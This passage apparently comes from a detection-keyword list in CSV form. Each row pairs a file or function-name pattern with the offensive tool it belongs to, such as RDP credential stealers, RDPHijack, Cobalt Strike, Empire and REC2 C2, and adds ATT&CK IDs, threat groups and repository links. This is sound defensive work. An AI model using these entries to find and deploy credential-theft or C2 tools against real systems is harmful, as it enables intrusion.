+"*RDPCredsStealerDLL.*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
+"*RDPCredsStealerDLL.dll*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z"
+"*rdphijack.*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z"
+"*rdphijack.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z"
+"*rdphijack.x64.*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z"
+"*rdphijack.x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z"
+"*rdphijack.x86.*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z"
+"*RDPHijack-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z"
+"*RDPHijack-BOF*","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z"
+"*RDPInception*","offensive_tool_keyword","RDPInception","A proof of concept for the RDP Inception Attack","T1188 - T1214 - T1076 - T1555.003","TA0007 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/RDPInception","1","1","N/A","N/A","4","338","677","2017-06-29T16:57:25Z","2017-06-29T10:08:23Z"
+"*rdpscraper*","offensive_tool_keyword","rdpscraper","rdpscraper - Enumerates users based off RDP Screenshots","T1110 - T1189 - T1056.001","TA0006 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/x90skysn3k/rdpscraper","1","1","N/A","N/A","1","34","15","2023-10-03T21:05:48Z","2017-07-19T17:02:24Z"
+"*RDPSpray*","offensive_tool_keyword","RDPSpray","Tool for password spraying RDP","T1110.001 - T1555.002","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/dafthack/RDPSpray","1","1","N/A","N/A","1","89","40","2018-10-12T18:32:51Z","2018-10-12T18:29:52Z"
+"*RdpThief*","offensive_tool_keyword","RdpThief","RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process. will perform API hooking. extract the clear-text credentials and save them to a file. An aggressor script accompanies it. which is responsible for managing the state. monitoring for new processes and injecting the shellcode in mstsc.exe. The DLL has been converted to shellcode using the sRDI project (https://github.com/monoxgas/sRDI). When enabled. RdpThief will get the process list every 5 seconds. search for mstsc.exe. and inject to it","T1055 - T1547 - T1059 - T1078","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","1014","503","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z"
+"*RdpThief.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
+"*rdrleakdiag.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*read_cs_teamserver*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*readShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z"
+"*ReadyToPhish.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
+"*RealBey/ThisIsNotRat*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z"
+"*realgam3*","offensive_tool_keyword","Github Username","github user Security Researcher @F5Networks hosting reverse tools and other pentester tools for data exfiltration and password attacks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/realgam3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Real-Passwords*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z"
+"*Reaper.exe kp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*Reaper.exe sp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*Reaper-main.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*rebootuser/LinEnum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*REC2 implant for Mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*REC2 implant for VirusTotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*rec2::modules::rec2mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*rec2_mastodon_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*rec2_virustotal_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*rec2mastodon.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*rec2virustotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*rec2virustotal.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*Receive-AgentJob*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*reciclador.cpp*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z"
+"*reciclador.dll*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z"
+"*reciclador.vcxproj*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z"
+"*recon_passive.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Recon-AD-*.dll*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z"
+"*Recon-AD-*.sln*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z"
+"*Recon-AD-*.vcxproj*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z"
+"*Recon-AD-AllLocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z"
